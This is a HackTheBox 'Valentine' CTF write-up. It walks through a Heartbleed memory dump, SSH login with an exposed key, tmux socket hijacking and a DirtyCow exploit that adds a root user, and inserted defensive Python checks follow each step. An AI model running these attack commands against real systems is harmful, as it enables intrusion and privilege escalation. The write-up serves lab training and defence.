
HackTheBox Valentine Writeup

Explore the fundamentals of cybersecurity in the Valentine Capture The Flag (CTF) challenge, an easy-level box. This straightforward CTF writeup walks through the key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.10.79 valentine.htb

Script to add hosts automatically

ip="10.10.10.79"
domain="valentine.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV valentine.htb -Pn

Output:

Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2024-10-06T15:19:57+00:00; 0s from scanner time.
Service Info: Host: 10.10.10.136; OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2014-0160 (Heartbleed Vulnerability)

Validate Vulnerability:

nmap --script=ssl-heartbleed -p 443 valentine.htb -Pn

Download the Proof of Concept (PoC):

git clone https://github.com/sensepost/heartbleed-poc.git
cd heartbleed-poc

Use the PoC and Extract the Password from the Dump:

python2 heartbleed-poc.py -n1 -f dump.bin valentine.htb -p 443
strings dump.bin | tail -n 1 | sed 's/\$text=//' | base64 -d

Note: This command might need to be run multiple times to capture the necessary data.
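Added example, written for this writeup rather than taken from it or from the sensepost PoC: the defender's view of CVE-2014-0160 in Python. It parses a TLS heartbeat message body (RFC 6520) with the bounds check that the patched OpenSSL added, and flags any message whose declared payload length cannot fit in the bytes actually received, which is the shape an IDS signature or a TLS-terminating proxy would alert on. The sample messages are constructed inline; nothing is sent to any host.

```python
import struct
from typing import Optional, Tuple

# TLS heartbeat message body (RFC 6520):
#   type(1) | payload_length(2) | payload | padding (at least 16 bytes)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16


def parse_heartbeat(msg: bytes) -> Tuple[int, bytes]:
    """Parse one heartbeat body with the bounds check that OpenSSL 1.0.1
    through 1.0.1f omitted (CVE-2014-0160).

    Raises ValueError when the declared payload_length cannot fit inside
    the bytes received; that mismatch is exactly what a Heartbleed probe
    relies on.
    """
    if len(msg) < 3:
        raise ValueError("message too short for the heartbeat header")
    hb_type = msg[0]
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        raise ValueError("unknown heartbeat type %d" % hb_type)
    (payload_len,) = struct.unpack("!H", msg[1:3])
    # The vulnerable code trusted payload_len and copied that many bytes out
    # of the record buffer, so a 3-byte request declaring 0xFFFF bytes got
    # back up to 64 KiB of adjacent process memory. The fix is this compare.
    if 1 + 2 + payload_len + MIN_PADDING > len(msg):
        raise ValueError("declared payload_length exceeds received message")
    return hb_type, msg[3:3 + payload_len]


def is_heartbleed_shaped(msg: bytes) -> bool:
    """Detection helper: True when the declared payload cannot fit in the
    message. No conforming client ever sends such a heartbeat."""
    try:
        parse_heartbeat(msg)
        return False
    except ValueError as exc:
        return "exceeds" in str(exc)


def build_heartbeat(hb_type: int, payload: bytes,
                    declared_len: Optional[int] = None) -> bytes:
    """Assemble a heartbeat body. declared_len exists only so a test can
    construct a malformed message offline."""
    length = len(payload) if declared_len is None else declared_len
    return (bytes([hb_type]) + struct.pack("!H", length)
            + payload + b"\x00" * MIN_PADDING)


# Constructed samples (not captured traffic)
BENIGN = build_heartbeat(HB_REQUEST, b"hello")
MALFORMED = build_heartbeat(HB_REQUEST, b"", declared_len=0x4000)

if __name__ == "__main__":
    print("benign parses to", parse_heartbeat(BENIGN))
    print("malformed flagged:", is_heartbleed_shaped(MALFORMED))
```

The check is the same arithmetic the upstream fix performs (`1 + 2 + payload + 16 > record length`); the vulnerable build simply never did the comparison, which is why the dump above can contain a user's form submission.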

Enumeration

Perform Directory Bruteforcing:

dirb http://valentine.htb

Results:

+ http://10.10.10.79/cgi-bin/ (CODE:403 | SIZE:287)
+ http://10.10.10.79/decode (CODE:200 | SIZE:552)
+ http://10.10.10.79/dev/    (DIRECTORY)
+ http://10.10.10.79/encode (CODE:200 | SIZE:554)
+ http://10.10.10.79/index (CODE:200 | SIZE:38)
+ http://10.10.10.79/index.php (CODE:200 | SIZE:38)
+ http://10.10.10.79/server-status (CODE:403 | SIZE:292)

Investigate the /dev/ Directory:

Going to http://valentine.htb/dev/, you find two files:

  1. notes.txt
  2. hype_key

Contents of notes.txt:

To do:
1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Download the hex-encoded, passphrase-protected key served as hype_key, convert it to a usable PEM file (openssl prompts for the passphrase recovered from the Heartbleed dump), and SSH into the machine:

curl -sk http://10.10.10.79/dev/hype_key > hype_key
xxd -r -p hype_key > hype_key_encrypted
openssl rsa -in hype_key_encrypted -out hype.key
chmod 600 hype.key
rm -f hype_key hype_key_encrypted
ssh -i hype.key hype@valentine.htb -o PubkeyAcceptedKeyTypes=+ssh-rsa
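The foothold exists because private key material sits in a web-served directory, hex-wrapped so a casual glance does not show a PEM header. Added example, not part of this writeup: a Python scan for a web root that recognises both raw PEM and hex-wrapped private keys and reports whether the PEM claims passphrase protection (which only slows an attacker down once the file is public). The directory layout and SAMPLE_PEM are constructed for the demo; the PEM body is filler, not key material.

```python
import binascii
import os
import re
import tempfile
from typing import Dict, List

PEM_KEY_RE = re.compile(
    rb"-----BEGIN (?:RSA |DSA |EC |OPENSSH |ENCRYPTED )?PRIVATE KEY-----")
HEX_ONLY_RE = re.compile(rb"^[0-9a-fA-F\s]+$")


def decoded_forms(data: bytes) -> List[bytes]:
    """Return the raw bytes and, when the file is pure hex, its decoded form."""
    forms = [data]
    if data and HEX_ONLY_RE.match(data):
        compact = re.sub(rb"\s", b"", data)
        if len(compact) % 2 == 0:
            forms.append(binascii.unhexlify(compact))
    return forms


def classify_key_blob(data: bytes) -> Dict[str, bool]:
    """Flag a private key in raw or hex-wrapped form and whether the PEM
    headers say it is passphrase protected."""
    for form in decoded_forms(data):
        if PEM_KEY_RE.search(form):
            return {
                "private_key": True,
                "hex_wrapped": form is not data,
                "passphrase_protected": (b"Proc-Type: 4,ENCRYPTED" in form
                                         or b"BEGIN ENCRYPTED PRIVATE KEY" in form),
            }
    return {"private_key": False, "hex_wrapped": False,
            "passphrase_protected": False}


def scan_webroot(root: str, max_bytes: int = 1 << 20) -> List[Dict[str, object]]:
    """Walk a web root and report every file that holds a private key."""
    findings: List[Dict[str, object]] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue
            result = classify_key_blob(data)
            if result["private_key"]:
                findings.append({"path": os.path.relpath(path, root), **result})
    return findings


# Constructed sample: a passphrase-protected PEM, hex-encoded the way
# /dev/hype_key was served. The body line is filler, not a real key.
SAMPLE_PEM = (b"-----BEGIN RSA PRIVATE KEY-----\n"
              b"Proc-Type: 4,ENCRYPTED\n"
              b"DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n"
              b"Y29uc3RydWN0ZWQgZmlsbGVyLCBub3QgYSBrZXk=\n"
              b"-----END RSA PRIVATE KEY-----\n")
SAMPLE_HEX = binascii.hexlify(SAMPLE_PEM)


def demo_scan() -> List[Dict[str, object]]:
    """Write the hex sample under a temporary dev/ directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "dev"))
        with open(os.path.join(root, "dev", "hype_key"), "wb") as fh:
            fh.write(SAMPLE_HEX)
        with open(os.path.join(root, "index.html"), "wb") as fh:
            fh.write(b"<html></html>")
        return scan_webroot(root)


if __name__ == "__main__":
    for finding in demo_scan():
        print(finding)
```

Run it over the document root (for this box, whatever Apache serves as `/`) from a cron job or a pre-deploy hook; a hit on a file like `dev/hype_key` is the finding that should have blocked going live, regardless of the passphrase.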

Privilege Escalation

Find the user.txt Flag:

find . -name user.txt -exec wc -c {} \; -exec cat {} \;

Check for Processes Running as Root (e.g., tmux):

ps -ef | grep tmux

You find a running tmux session.

Retrieve Commands from History:

history

From the history, the following command is revealed:

tmux -S /.devs/dev_sess

This gives access to a tmux session where you can now obtain the root.txt flag:

cat /root/root.txt
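The root tmux session is reachable only because its server socket is owned by root yet writable by another account: whoever can open that socket gets root's shell. Added example, not part of this writeup: a Python audit that walks a directory tree for unix sockets owned by a privileged uid that group or world can write to. The `privileged_uid` parameter is an assumption of this example so the demo can run unprivileged; in production run it as root over `/` with the default of 0.

```python
import os
import socket
import stat
import tempfile
from typing import Dict, List


def audit_sockets(root: str, privileged_uid: int = 0) -> List[Dict[str, object]]:
    """Report unix sockets under `root` owned by privileged_uid that group or
    world can write to. A tmux server socket in this state hands its
    session to every user the permissions admit."""
    findings: List[Dict[str, object]] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:          # os.walk lists sockets as files
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISSOCK(st.st_mode) or st.st_uid != privileged_uid:
                continue
            group_w = bool(st.st_mode & stat.S_IWGRP)
            world_w = bool(st.st_mode & stat.S_IWOTH)
            if group_w or world_w:
                findings.append({
                    "path": path,
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "group_writable": group_w,
                    "world_writable": world_w,
                })
    return findings


def demo() -> List[Dict[str, object]]:
    """Constructed scenario: bind a socket named like the one on this box in a
    temp dir, give it 0660 (owner and group may connect), and audit it as if
    its owner were the privileged account."""
    with tempfile.TemporaryDirectory() as tmp:
        sock_path = os.path.join(tmp, "dev_sess")
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            srv.bind(sock_path)
            os.chmod(sock_path, 0o660)
            return audit_sockets(tmp, privileged_uid=os.getuid())
        finally:
            srv.close()


if __name__ == "__main__":
    for f in demo():
        print(f)
```

The complementary runtime check is the `ps -ef | grep tmux` step above: a tmux server process running as root with a `-S` socket path outside the default `/tmp/tmux-0/` is worth a look even before the permission audit finishes.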

Alternative Privilege Escalation (DirtyCow)

We suspect the system is running an old kernel vulnerable to DirtyCow (CVE-2016-5195). To confirm, we check the kernel version:

uname -a

Output:

Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 GNU/Linux

The version is vulnerable. Next, we use searchsploit to find available DirtyCow exploits:

searchsploit dirty

From the results, we select an exploit that modifies /etc/passwd to add a new root user. We download the exploit:

searchsploit -m exploits/linux/local/40839.c

Upload the exploit to the target:

scp -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype.key 40839.c hype@valentine.htb:/home/hype/

Run the exploit:

gcc -pthread 40839.c -o dirtycow -lcrypt
chmod +x dirtycow
./dirtycow

Switch to the created user:

su firefart

You now have root access via the new user created by the DirtyCow exploit.
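Added example, not part of this writeup: an integrity check on `/etc/passwd` that catches what this path leaves behind. 40839.c replaces the first line of the file with its new uid-0 account (keeping a copy of the original at `/tmp/passwd.bak`), so the artefacts are a uid-0 account other than root, root's own line missing, and a password hash sitting in the second field where `x` belongs. The passwd excerpts below are constructed; a real deployment reads `/etc/passwd` and keeps the baseline in a file-integrity store.

```python
from typing import Dict, List, Optional

# Constructed /etc/passwd excerpts (not taken from any host)
BASELINE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hype:x:1000:1000:hype,,,:/home/hype:/bin/bash
"""

# What the file looks like after the root line has been overwritten with a
# new uid-0 entry carrying its own hash (hash value is filler).
TAMPERED_PASSWD = """firefart:$6$constructedsalt$constructedhash:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hype:x:1000:1000:hype,,,:/home/hype:/bin/bash
"""


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Parse passwd(5) lines into dicts; malformed lines are kept and flagged."""
    entries: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "name": fields[0], "malformed": True})
            continue
        uid: Optional[int] = int(fields[2]) if fields[2].isdigit() else None
        entries.append({
            "line": lineno,
            "name": fields[0],
            "uid": uid,
            # Modern systems keep hashes in /etc/shadow; anything other than a
            # placeholder here means someone wrote a credential into passwd.
            "hash_in_passwd": fields[1] not in ("x", "*", "!", ""),
            "shell": fields[6],
            "malformed": False,
        })
    return entries


def audit_passwd(text: str) -> Dict[str, object]:
    """Summarise the indicators a uid-0 backdoor account leaves in passwd."""
    entries = parse_passwd(text)
    uid0 = [e["name"] for e in entries if e.get("uid") == 0]
    return {
        "uid0_accounts": uid0,
        "unexpected_uid0": [n for n in uid0 if n != "root"],
        "root_missing": "root" not in uid0,
        "hash_in_passwd": [e["name"] for e in entries if e.get("hash_in_passwd")],
        "malformed_lines": [e["line"] for e in entries if e["malformed"]],
    }


def diff_against_baseline(baseline: str, current: str) -> Dict[str, List[str]]:
    """Line-level diff against a known-good copy, the way a tripwire reports."""
    base, cur = set(baseline.splitlines()), set(current.splitlines())
    return {"added": sorted(cur - base), "removed": sorted(base - cur)}


if __name__ == "__main__":
    print(audit_passwd(TAMPERED_PASSWD))
    print(diff_against_baseline(BASELINE_PASSWD, TAMPERED_PASSWD))
```

On a live host, pair this with an alert on `/tmp/passwd.bak` appearing and on any write to `/etc/passwd` that does not come from the account-management tools; the kernel fix itself is the real remediation, and the `uname -a` output above is the version string to compare against your distribution's patched build.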

This post is licensed under CC BY 4.0 by the author.